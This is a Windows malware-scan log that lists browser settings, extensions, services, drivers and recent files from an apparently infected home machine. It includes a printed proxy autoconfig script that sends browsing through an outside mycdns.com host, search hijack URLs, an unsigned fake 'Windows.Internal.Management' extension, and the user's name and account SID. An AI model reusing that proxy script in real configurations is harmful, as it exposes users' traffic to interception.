SearchScopes: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://malaysia.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_16_19_orgnl&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dmy%26pa%3DHodor%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyDzytBtN1L2XzutAtFtBtCtFtCtFtDtN1L1Czu1M1Q1CtBtBtFtCtFtDtN1L1G1B1V1N2Y1L1Qzu2SyDtA0AtByCtDtB0FtGyEyB0AzytGzzyCtB0FtGyEtCyB0BtGyCyCyCtBtAtAyE0CtD0B0E0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyE%26cr%3D1993093879%26a%3Dhdr_s_16_19_orgnl%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001 -> {E35DF2EC-80F6-42D5-B78E-83DC7BE9544B} URL = hxxps://malaysia.search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-12-08] (Internet Download Manager, Tonec Inc.)
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2015-08-27] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\Office16\GROOVEEX.DLL [2015-08-27] (Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-12-08] (Internet Download Manager, Tonec Inc.)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2015-08-27] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2015-08-27] (Microsoft Corporation)
Toolbar: HKLM - DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files (x86)\DAEMON Tools Toolbar\DTToolbar64.dll No File
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2015-08-27] (Microsoft Corporation)
 
Edge: 
======
Edge HomeButtonPage: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001 -> hxxp://google.com/
 
FireFox:
========
FF DefaultProfile: 41A66E7E5EE1
FF ProfilePath: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\41A66E7E5EE1\Profiles\90kdely9.default [not found]
FF ProfilePath: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\41A66E7E5EE1\Profiles\41A66E7E5EE1 [not found]
FF ProfilePath: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\90kdely9.default [2016-08-27]
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\90kdely9.default -> Yahoo! Powered
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\90kdely9.default -> Yahoo! Powered
FF Homepage: Mozilla\Firefox\Profiles\90kdely9.default -> hxxps://malaysia.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fremkfs_16_24&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCtByCtN1L2XzutAtFtBtBtFtAtFzztN1L1Czu1BtCtDtN1L1G1B1V1N2Y1L1Qzu2StBzytC0EtBtAtC0EtGyC0D0D0AtGtDzytC0EtGtAyDtCyEtGtD0D0E0CtAtA0FyCtAyBzy0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyE%26cr%3D964303875%26a%3Dwbf_fremkfs_16_24%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage
FF NewTab: Mozilla\Firefox\Profiles\90kdely9.default -> about:newtab
FF Keyword.URL: Mozilla\Firefox\Profiles\90kdely9.default -> user_pref("keyword.URL", true);
FF Extension: (Windows.Internal.Management) - C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\90kdely9.default\Extensions\{A333FFE3-D829-DE59-F118-6BB57102743B} [2016-08-24] [not signed]
FF SearchPlugin: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\90kdely9.default\searchplugins\Search Provided by Yahoo.xml [2016-05-12]
FF SearchPlugin: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\90kdely9.default\searchplugins\yahoo! powered.xml [2016-06-15]
FF ProfilePath: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1 [2016-11-28]
FF NewTab: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> about:newtab
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> Yahoo! Powered
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> Yahoo! Powered
FF Homepage: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> hxxp://www.google.com/
FF Keyword.URL: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> user_pref("keyword.URL", true);
FF NetworkProxy: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> autoconfig_url", "data:text/plain, function FindProxyForURL(url, host) {if(isInNet(host, '192.168.0.0', '255.255.0.0')) return 'DIRECT'; \nif(host == 'us1-base.cd-n.net') return 'DIRECT'; \nif(host == 'us2-base.cd-n.net') return 'DIRECT'; \nif(host == 'us3-base.cd-n.net') return 'DIRECT'; \nif(host == 'jp1-base.cd-n.net') return 'DIRECT'; \nif(host == 'de1-base.cd-n.net') return 'DIRECT'; \nif(host == 'au1-base.cd-n.net') return 'DIRECT'; \nif(host == 'ca1-base.cd-n.net') return 'DIRECT'; \nif(host == 'ir1-base.cd-n.net') return 'DIRECT'; \nif(host == 'sg1-base.cd-n.net') return 'DIRECT'; \nif(host == 'kr1-base.cd-n.net') return 'DIRECT'; \nif(host == '127.0.0.1') return 'DIRECT'; \nif(host == 'localhost') return 'DIRECT'; \nif(host == 'sg1-base.cd-n.net') return 'DIRECT'; \nreturn 'HTTPS giydslrsga4c4ojxfyzdkmbdge2doojzgq2tmmbq.mycdns.com:443';}"
FF NetworkProxy: Mozilla\Firefox\Profiles\41A66E7E5EE1 -> type", 0
FF Extension: (Hoxx VPN Proxy) - C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\@hoxx-vpn.xpi [2016-11-18]
FF Extension: (Flash and Video Download) - C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\{bee6eb20-01e0-ebd1-da83-080329fb9a3a} [2016-09-28]
FF SearchPlugin: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\Search Provided by Yahoo.xml [2016-05-12]
FF SearchPlugin: C:\Users\taurus silver\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\yahoo! powered.xml [2016-06-15]
FF HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2016-03-10]
FF HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\taurus silver\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\taurus silver\AppData\Roaming\IDM\idmmzcc5 [2016-11-28] [not signed]
FF HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-08] ()
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2015-08-27] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-08] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-04] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-04] (Intel Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-08-27] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2015-08-27] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Pro 10\npnitromozilla.dll [2015-05-06] (Nitro PDF)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-03-08] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-03-08] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin HKU\S-1-5-21-3880736737-1765239813-1450978002-1001: @talk.google.com/GoogleTalkPlugin -> C:\Users\taurus silver\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-3880736737-1765239813-1450978002-1001: @talk.google.com/O1DPlugin -> C:\Users\taurus silver\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-3880736737-1765239813-1450978002-1001: @tools.google.com/Google Update;version=3 -> C:\Users\taurus silver\AppData\Local\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin HKU\S-1-5-21-3880736737-1765239813-1450978002-1001: @tools.google.com/Google Update;version=9 -> C:\Users\taurus silver\AppData\Local\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\taurus silver\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\taurus silver\AppData\Roaming\mozilla\plugins\npo1d.dll [2015-12-08] (Google)
 
Chrome: 
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.google.com.my/
CHR StartupUrls: ChromeDefaultData -> "hxxps://www.google.com.my/"
CHR Plugin: (Widevine Content Decryption Module) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\WidevineCdm\1.4.8.903\_platform_specific\win_x86\widevinecdmadapter.dll => No File
CHR Plugin: (Shockwave Flash) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\PepperFlash\23.0.0.166\pepflashplayer.dll => No File
CHR Profile: C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2016-11-26] <==== ATTENTION
CHR Extension: (Kami - PDF and Document Markup) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ecnphlgnajanjnkcmbpancdjoidceilk [2016-11-26]
CHR Extension: (AdBlock) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-11-26]
CHR Extension: (IDM Integration Module) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2016-11-21]
CHR Extension: (Effective Measure Community Plugin) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nkgdmfemjeohjmeeabffnombnpkkogjm [2015-08-15]
CHR Extension: (Chrome Web Store Payments) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Chrome Media Router) - C:\Users\taurus silver\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-21]
CHR HKLM\...\Chrome\Extension: [bmlggjgglgmlgbendppbpmkpakefkmkd] - <no Path/update_url>
CHR HKLM\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-04-16]
CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bmlggjgglgmlgbendppbpmkpakefkmkd] - <no Path/update_url>
CHR HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bmlggjgglgmlgbendppbpmkpakefkmkd] - <no Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2016-04-16]
CHR HKLM-x32\...\Chrome\Extension: [npdicihegicnhaangkdmcgbjceoemeoo] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1295376 2016-07-01] (Autodesk Inc.)
R2 ASUS Flip Service; C:\Program Files\ASUS\ASUS FlipLock\FlipService.exe [7680 2014-10-31] (ASUS) [File not signed]
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.11.399\AsusWSWinService.exe [71168 2014-08-20] (ASUS Cloud Corporation) [File not signed]
R2 BBDemon; D:\Catia\intel_a\code\bin\CATSysDemon.exe [36864 2007-05-04] (Dassault Systemes) [File not signed]
S3 BRSptStub; C:\ProgramData\BitRaider\BRSptStub.exe [363208 2015-12-30] (BitRaider, LLC)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2848440 2015-07-04] (Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-05-17] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-05-17] (Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [42096 2016-11-08] (Dropbox, Inc.)
R2 ekrn; C:\Program Files\ESET\ESET Smart Security\ekrn.exe [2770312 2016-11-28] (ESET)
R2 ExpressCache; C:\Program Files\Condusiv Technologies\ExpressCache\ExpressCache.exe [828656 2013-11-19] (Condusiv Technologies)
R2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [108032 2016-06-09] (Freemake) [File not signed]
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163712 2016-06-15] (NVIDIA Corporation)
U2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2016-11-16] (Hi-Rez Studios) [File not signed]
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [373160 2015-12-19] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-14] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [154584 2014-09-04] (Intel Corporation)
R2 NitroDriverReadSpool10; C:\Program Files\Nitro\Pro 10\NitroPDFDriverService10x64.exe [324760 2015-05-06] (Nitro PDF Software)
R2 NitroUpdateService; C:\Program Files\Nitro\Pro 10\Nitro_UpdateService.exe [418968 2015-05-06] ()
S3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [4362656 2016-02-24] (INCA Internet Co., Ltd.) [File not signed]
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-06-15] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3632576 2016-06-15] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2521024 2016-06-15] (NVIDIA Corporation)
R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [629648 2016-11-14] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2016-07-01] (Microsoft Corporation)
R2 WtuSystemSupport; C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [1195920 2015-07-26] ()
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2014-09-29] (Atheros) [File not signed]
S2 Thibechmerciph; C:\Program Files (x86)\Sernetynuwuent\anoteshjunerseVerfier.dll [X]
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [76032 2015-10-21] (Advanced Micro Devices, Inc.)
R3 athr; C:\WINDOWS\System32\drivers\athw10x.sys [4323976 2015-11-18] (Qualcomm Atheros Communications, Inc.)
R3 ATP; C:\WINDOWS\System32\drivers\AsusTP.sys [101368 2016-03-04] (ASUS Corporation)
S3 BRDriver64_1_3_3_E02B25FC; C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [78088 2015-12-31] (BitRaider)
R1 eamonm; C:\WINDOWS\System32\DRIVERS\eamonm.sys [262792 2016-11-28] (ESET)
R0 edevmon; C:\WINDOWS\System32\DRIVERS\edevmon.sys [199304 2016-11-28] (ESET)
S0 eelam; C:\WINDOWS\System32\DRIVERS\eelam.sys [15488 2016-11-28] (ESET)
R1 ehdrv; C:\WINDOWS\system32\DRIVERS\ehdrv.sys [197248 2016-11-28] (ESET)
R2 ekbdflt; C:\WINDOWS\system32\DRIVERS\ekbdflt.sys [153216 2016-11-28] (ESET)
R1 epfw; C:\WINDOWS\system32\DRIVERS\epfw.sys [208520 2016-11-28] (ESET)
R1 EpfwLWF; C:\WINDOWS\system32\DRIVERS\EpfwLWF.sys [61568 2016-11-28] (ESET)
R0 epfwwfp; C:\WINDOWS\System32\DRIVERS\epfwwfp.sys [84616 2016-11-28] (ESET)
S4 epfwwfpr; C:\WINDOWS\system32\DRIVERS\epfwwfpr.sys [170792 2015-07-30] (ESET)
S3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [31464 2015-08-13] (ELAN Microelectronic Corp.)
R1 excfs; C:\WINDOWS\System32\DRIVERS\excfs.sys [25840 2013-11-19] (Condusiv Technologies)
R0 excsd; C:\WINDOWS\System32\DRIVERS\excsd.sys [117488 2013-11-19] (Condusiv Technologies)
R3 GMLXDFltr01; C:\WINDOWS\system32\drivers\GMLXDFltr01.sys [10752 2014-07-24] (LXD Development, Inc.)
R1 HWiNFO32; C:\WINDOWS\SysWOW64\drivers\HWiNFO64A.SYS [26528 2015-12-26] (REALiX™)
R3 iaLPSS_GPIO; C:\WINDOWS\System32\drivers\iaLPSS_GPIO.sys [46856 2015-06-15] (Intel Corporation)
R0 IntelHSWPcc; C:\WINDOWS\System32\drivers\IntelPcc.sys [88256 2015-10-22] (Intel Corporation)
R3 kbfiltr; C:\WINDOWS\System32\drivers\kbfiltr.sys [17280 2012-08-06] ( )
R3 kxspb; C:\WINDOWS\System32\drivers\kxspb.sys [50208 2015-10-08] (Kionix, Inc.)
R1 LUMDriver; C:\Windows\system32\drivers\LUMDriver.sys [24848 2008-01-02] (IBM)
R3 Neo_VPN; C:\WINDOWS\System32\drivers\Neo6_x64_VPN.sys [38216 2016-08-12] (SoftEther Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-06-15] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [56384 2016-04-14] (NVIDIA Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [936192 2016-03-08] (Realtek                                            )
R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [777944 2016-03-08] (Realsil Semiconductor Corporation)
R1 SeLow; C:\WINDOWS\system32\DRIVERS\SeLow_x64.sys [51024 2016-11-24] (SoftEther Corporation)
S3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [42600 2016-03-08] (Synaptics Incorporated)
S3 taphss6; C:\WINDOWS\System32\drivers\taphss6.sys [42184 2014-11-22] (Anchorfree Inc.)
S3 tapSF0901; C:\WINDOWS\System32\drivers\tapSF0901.sys [39104 2015-07-31] (Spotflux, Inc.)
S3 usbrndis6; C:\WINDOWS\system32\DRIVERS\usb80236.sys [23040 2015-10-30] (Microsoft Corporation)
R1 VBoxUSBMon; C:\WINDOWS\system32\DRIVERS\VBoxUSBMon.sys [127432 2015-09-16] (BigNox Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
S3 xhunter1; C:\WINDOWS\xhunter1.sys [36808 2016-08-19] (Wellbia.com Co., Ltd.)
S3 08AFB886; \??\C:\ProgramData\0022E94E_tvn [X]
S3 dbx; system32\DRIVERS\dbx.sys [X]
U4 Messenger; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-28 04:37 - 2016-11-28 04:38 - 00000000 ____D C:\FRST
2016-11-28 04:34 - 2016-11-28 04:34 - 00050687 _____ C:\Users\taurus silver\Downloads\FRST.txt
2016-11-28 04:20 - 2016-11-28 04:20 - 00153216 _____ (ESET) C:\WINDOWS\system32\Drivers\ekbdflt.sys
2016-11-28 04:03 - 2016-11-28 04:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET
2016-11-28 04:03 - 2016-11-28 04:03 - 00000000 ____D C:\ProgramData\ESET
2016-11-28 04:03 - 2016-11-28 04:03 - 00000000 ____D C:\Program Files\ESET
2016-11-28 03:34 - 2016-11-28 03:34 - 00026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\jnwmon.dll
2016-11-28 03:25 - 2016-11-28 03:25 - 00001089 _____ C:\Users\taurus silver\Desktop\DLLSuite.lnk
2016-11-28 03:25 - 2016-11-28 03:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DLL Suite 9.0
2016-11-28 03:00 - 2016-11-28 03:00 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\WildTangent
2016-11-28 02:54 - 2016-11-28 02:54 - 00003322 _____ C:\WINDOWS\System32\Tasks\{98E2AC70-B5FB-4270-AB02-FEA0C9C05CB5}
2016-11-28 01:23 - 2016-11-28 03:50 - 00000000 ____D C:\MINIONAPP
2016-11-28 01:23 - 2016-11-28 03:20 - 00000657 _____ C:\Users\taurus silver\Desktop\MINIONAPP.lnk
2016-11-28 01:23 - 2016-11-28 01:23 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MINIONAPP
2016-11-28 00:37 - 2016-11-28 00:37 - 00000000 ____D C:\Users\taurus silver\Documents\WeChat Files
2016-11-27 23:56 - 2016-11-27 23:56 - 00000000 ____D C:\Users\taurus silver\Documents\Guild Wars 2
2016-11-27 20:35 - 2016-11-27 20:35 - 00000000 ____D C:\Users\taurus silver\AppData\Local\MMOMINION
2016-11-26 02:46 - 2016-11-28 03:46 - 00000569 _____ C:\Users\Public\Desktop\Guild Wars 2.lnk
2016-11-26 02:46 - 2016-11-26 02:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Guild Wars 2
2016-11-26 02:45 - 2016-11-27 22:01 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\Guild Wars 2
2016-11-24 20:45 - 2016-11-24 20:58 - 265431973 _____ (© JOY Inc. ) C:\Users\taurus silver\Downloads\GigaSlave_TH_v102_Setup.exe
